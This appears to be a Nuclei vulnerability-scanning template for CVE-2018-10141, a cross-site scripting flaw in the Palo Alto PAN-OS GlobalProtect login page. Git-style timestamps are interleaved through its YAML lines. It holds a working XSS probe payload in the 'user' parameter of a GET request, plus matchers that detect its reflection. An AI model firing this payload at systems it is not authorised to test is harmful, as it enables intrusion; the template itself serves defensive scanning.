2021-05-03 09:46:08 +00:00
id : CVE-2018-10141
2021-05-02 19:26:49 +00:00
info :
2022-08-19 20:44:38 +00:00
name : Palo Alto Networks PAN-OS GlobalProtect <8.1.4 - Cross-Site Scripting
2021-05-02 19:26:49 +00:00
author : dhiyaneshDk
2022-04-22 10:38:41 +00:00
severity : medium
2022-08-19 20:44:38 +00:00
description : Palo Alto Networks PAN-OS before 8.1.4 GlobalProtect Portal Login page allows an unauthenticated attacker to inject arbitrary JavaScript or HTML, making it vulnerable to cross-site scripting.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.
2023-09-06 12:57:14 +00:00
remediation : |
Upgrade to Palo Alto Networks PAN-OS GlobalProtect VPN client version 8.1.4 or later to mitigate this vulnerability.
2022-04-22 10:38:41 +00:00
reference :
2022-05-17 09:18:12 +00:00
- https://security.paloaltonetworks.com/CVE-2018-10141
2022-08-19 20:44:38 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-10141
2024-01-29 17:11:14 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/Elsfa7-110/kenzer-templates
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-10141
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.00126
2024-01-29 17:11:14 +00:00
epss-percentile : 0.47114
2023-09-06 12:57:14 +00:00
cpe : cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : paloaltonetworks
product : pan-os
2023-12-05 09:50:33 +00:00
tags : cve,cve2018,panos,vpn,globalprotect,xss,paloaltonetworks
2021-05-02 19:26:49 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-05-02 19:26:49 +00:00
- method : GET
path :
- '{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x'
2021-05-03 09:46:08 +00:00
2021-05-02 19:26:49 +00:00
matchers-condition : and
matchers :
- type : word
2021-11-11 17:29:29 +00:00
part : body
2021-05-02 19:26:49 +00:00
words :
2021-05-03 09:46:08 +00:00
- 'var valueUser = "j";-alert(1)-"x";'
2021-05-02 19:26:49 +00:00
- type : word
2021-11-11 17:29:29 +00:00
part : header
2021-05-02 19:26:49 +00:00
words :
- "text/html"
2021-05-03 09:46:08 +00:00
2021-05-02 19:26:49 +00:00
- type : status
status :
2022-01-04 19:34:16 +00:00
- 200
2024-01-30 06:46:18 +00:00
# digest: 4a0a004730450220507ffbfb76be5730a985c05105e1573ea10692076caecd9b07d4f35e8f7a889e022100b86bc6fa194d4eafaad61560a771f32fee62f36c99f9cc3cda50479528ee67f0:922c64590222798bb761d5b6d8e72950
